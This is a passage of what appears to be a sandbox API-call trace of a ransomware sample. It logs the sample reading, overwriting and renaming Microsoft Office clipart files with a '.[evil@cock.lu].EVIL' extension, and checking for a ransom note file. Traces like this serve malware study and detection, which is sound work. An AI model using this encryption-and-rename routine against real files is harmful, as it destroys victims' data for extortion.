returned 0x84b1160800 [0128.020] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0128.020] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0090781.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0090781.wmf"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0090781.WMF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0090781.wmf.[evil@cock.lu].evil")) returned 1 [0128.021] ??_V@YAXPEAX@Z () returned 0x1 [0128.024] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0090781.WMF", dwFileAttributes=0x200) returned 0 [0128.024] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0128.024] wcsstr (_Str="J0090783.WMF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0128.024] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0090783.WMF") returned 69 [0128.024] wcscmp (_String1="J0090783.WMF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0128.024] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="J0090783.WMF") returned 0x0 [0128.024] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0090783.WMF") returned 0x45 [0128.025] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0090783.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0090783.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0128.027] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b303f040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b303f040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x1b16, lpOverlapped=0x0) returned 1 [0128.043] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0128.043] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0128.043] _errno () returned 0x84b1160840 [0128.043] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0128.043] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b303f040*, nNumberOfBytesToWrite=0x1b20, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b303f040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x1b20, lpOverlapped=0x0) returned 1 [0128.043] CloseHandle (hObject=0x1a8) returned 1 [0128.043] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0090783.WMF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0128.043] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0128.043] __uncaught_exception () returned 0x84b1160800 [0128.043] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0128.043] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0090783.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0090783.wmf"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0090783.WMF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0090783.wmf.[evil@cock.lu].evil")) returned 1 [0128.045] ??_V@YAXPEAX@Z () returned 0x1 [0128.048] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0090783.WMF", dwFileAttributes=0x200) returned 0 [0128.048] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0128.048] wcsstr (_Str="J0093905.WMF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0128.048] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0093905.WMF") returned 69 [0128.049] wcscmp (_String1="J0093905.WMF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0128.049] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="J0093905.WMF") returned 0x0 [0128.049] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0093905.WMF") returned 0x45 [0128.049] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0093905.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0093905.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0128.051] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e24040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e24040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0xa442, lpOverlapped=0x0) returned 1 [0128.065] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0128.065] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0128.065] _errno () returned 0x84b1160840 [0128.065] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0128.065] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e24040*, nNumberOfBytesToWrite=0xa460, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e24040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0xa460, lpOverlapped=0x0) returned 1 [0128.066] CloseHandle (hObject=0x1a8) returned 1 [0128.066] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0093905.WMF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0128.066] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0128.066] __uncaught_exception () returned 0x84b1160800 [0128.066] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0128.066] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0093905.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0093905.wmf"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0093905.WMF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0093905.wmf.[evil@cock.lu].evil")) returned 1 [0128.067] ??_V@YAXPEAX@Z () returned 0x1 [0128.070] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0093905.WMF", dwFileAttributes=0x200) returned 0 [0128.070] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0128.070] wcsstr (_Str="J0098497.WMF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0128.070] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0098497.WMF") returned 69 [0128.070] wcscmp (_String1="J0098497.WMF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0128.070] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="J0098497.WMF") returned 0x0 [0128.070] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0098497.WMF") returned 0x45 [0128.070] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0098497.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0098497.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0128.072] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e23040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e23040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x136a, lpOverlapped=0x0) returned 1 [0128.088] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0128.088] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0128.088] _errno () returned 0x84b1160840 [0128.088] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0128.088] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e23040*, nNumberOfBytesToWrite=0x1380, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e23040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x1380, lpOverlapped=0x0) returned 1 [0128.088] CloseHandle (hObject=0x1a8) returned 1 [0128.088] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0098497.WMF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0128.089] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0128.089] __uncaught_exception () returned 0x84b1160800 [0128.089] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0128.089] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0098497.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0098497.wmf"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0098497.WMF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0098497.wmf.[evil@cock.lu].evil")) returned 1 [0128.089] ??_V@YAXPEAX@Z () returned 0x1 [0128.092] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0098497.WMF", dwFileAttributes=0x200) returned 0 [0128.093] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0128.093] wcsstr (_Str="J0099145.JPG", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0128.093] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0099145.JPG") returned 69 [0128.093] wcscmp (_String1="J0099145.JPG", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0128.093] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="J0099145.JPG") returned 0x0 [0128.093] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0099145.JPG") returned 0x45 [0128.093] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0099145.JPG" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0099145.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0128.095] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e2a040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e2a040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x60b7, lpOverlapped=0x0) returned 1 [0128.106] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0128.106] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0128.106] _errno () returned 0x84b1160840 [0128.107] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0128.107] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e2a040*, nNumberOfBytesToWrite=0x60c0, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e2a040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x60c0, lpOverlapped=0x0) returned 1 [0128.107] CloseHandle (hObject=0x1a8) returned 1 [0128.107] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0099145.JPG", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0128.107] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0128.107] __uncaught_exception () returned 0x84b1160800 [0128.107] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0128.107] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0099145.JPG" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0099145.jpg"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0099145.JPG.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0099145.jpg.[evil@cock.lu].evil")) returned 1 [0128.108] ??_V@YAXPEAX@Z () returned 0x1 [0128.111] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0099145.JPG", dwFileAttributes=0x200) returned 0 [0128.111] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0128.111] wcsstr (_Str="J0099146.WMF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0128.111] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0099146.WMF") returned 69 [0128.111] wcscmp (_String1="J0099146.WMF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0128.111] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="J0099146.WMF") returned 0x0 [0128.111] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0099146.WMF") returned 0x45 [0128.111] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0099146.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0099146.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0128.113] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e20040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e20040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x40d4, lpOverlapped=0x0) returned 1 [0128.127] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0128.127] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0128.127] _errno () returned 0x84b1160840 [0128.127] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0128.127] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e20040*, nNumberOfBytesToWrite=0x40e0, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e20040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x40e0, lpOverlapped=0x0) returned 1 [0128.127] CloseHandle (hObject=0x1a8) returned 1 [0128.127] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0099146.WMF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0128.128] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0128.128] __uncaught_exception () returned 0x84b1160800 [0128.128] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0128.128] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0099146.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0099146.wmf"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0099146.WMF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0099146.wmf.[evil@cock.lu].evil")) returned 1 [0128.129] ??_V@YAXPEAX@Z () returned 0x1 [0128.131] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0099146.WMF", dwFileAttributes=0x200) returned 0 [0128.131] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0128.131] wcsstr (_Str="J0099147.JPG", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0128.131] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0099147.JPG") returned 69 [0128.131] wcscmp (_String1="J0099147.JPG", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0128.131] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="J0099147.JPG") returned 0x0 [0128.132] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0099147.JPG") returned 0x45 [0128.132] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0099147.JPG" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0099147.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0128.134] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e20040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e20040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x5f39, lpOverlapped=0x0) returned 1 [0128.153] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0128.153] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0128.153] _errno () returned 0x84b1160840 [0128.153] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0128.153] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e20040*, nNumberOfBytesToWrite=0x5f40, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e20040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x5f40, lpOverlapped=0x0) returned 1 [0128.153] CloseHandle (hObject=0x1a8) returned 1 [0128.154] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0099147.JPG", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0128.154] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0128.154] __uncaught_exception () returned 0x84b1160800 [0128.154] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0128.154] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0099147.JPG" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0099147.jpg"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0099147.JPG.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0099147.jpg.[evil@cock.lu].evil")) returned 1 [0128.155] ??_V@YAXPEAX@Z () returned 0x1 [0128.159] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0099147.JPG", dwFileAttributes=0x200) returned 0 [0128.159] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0128.159] wcsstr (_Str="J0099148.JPG", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0128.159] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0099148.JPG") returned 69 [0128.159] wcscmp (_String1="J0099148.JPG", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0128.159] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="J0099148.JPG") returned 0x0 [0128.159] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0099148.JPG") returned 0x45 [0128.159] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0099148.JPG" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0099148.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0128.161] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e21040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e21040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x4752, lpOverlapped=0x0) returned 1 [0128.174] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0128.174] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0128.174] _errno () returned 0x84b1160840 [0128.174] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0128.174] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e21040*, nNumberOfBytesToWrite=0x4760, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e21040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x4760, lpOverlapped=0x0) returned 1 [0128.175] CloseHandle (hObject=0x1a8) returned 1 [0128.175] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0099148.JPG", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0128.175] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0128.175] __uncaught_exception () returned 0x84b1160800 [0128.175] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0128.175] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0099148.JPG" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0099148.jpg"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0099148.JPG.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0099148.jpg.[evil@cock.lu].evil")) returned 1 [0128.176] ??_V@YAXPEAX@Z () returned 0x1 [0128.180] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0099148.JPG", dwFileAttributes=0x200) returned 0 [0128.180] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0128.180] wcsstr (_Str="J0099149.WMF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0128.180] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0099149.WMF") returned 69 [0128.180] wcscmp (_String1="J0099149.WMF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0128.180] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="J0099149.WMF") returned 0x0 [0128.180] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0099149.WMF") returned 0x45 [0128.180] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0099149.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0099149.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0128.183] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e2c040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e2c040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x11dfe, lpOverlapped=0x0) returned 1 [0128.200] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0128.200] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0128.200] _errno () returned 0x84b1160840 [0128.200] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0128.200] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e2c040*, nNumberOfBytesToWrite=0x11e00, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e2c040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x11e00, lpOverlapped=0x0) returned 1 [0128.200] CloseHandle (hObject=0x1a8) returned 1 [0128.201] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0099149.WMF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0128.201] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0128.201] __uncaught_exception () returned 0x84b1160800 [0128.201] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0128.201] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0099149.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0099149.wmf"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0099149.WMF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0099149.wmf.[evil@cock.lu].evil")) returned 1 [0128.202] ??_V@YAXPEAX@Z () returned 0x1 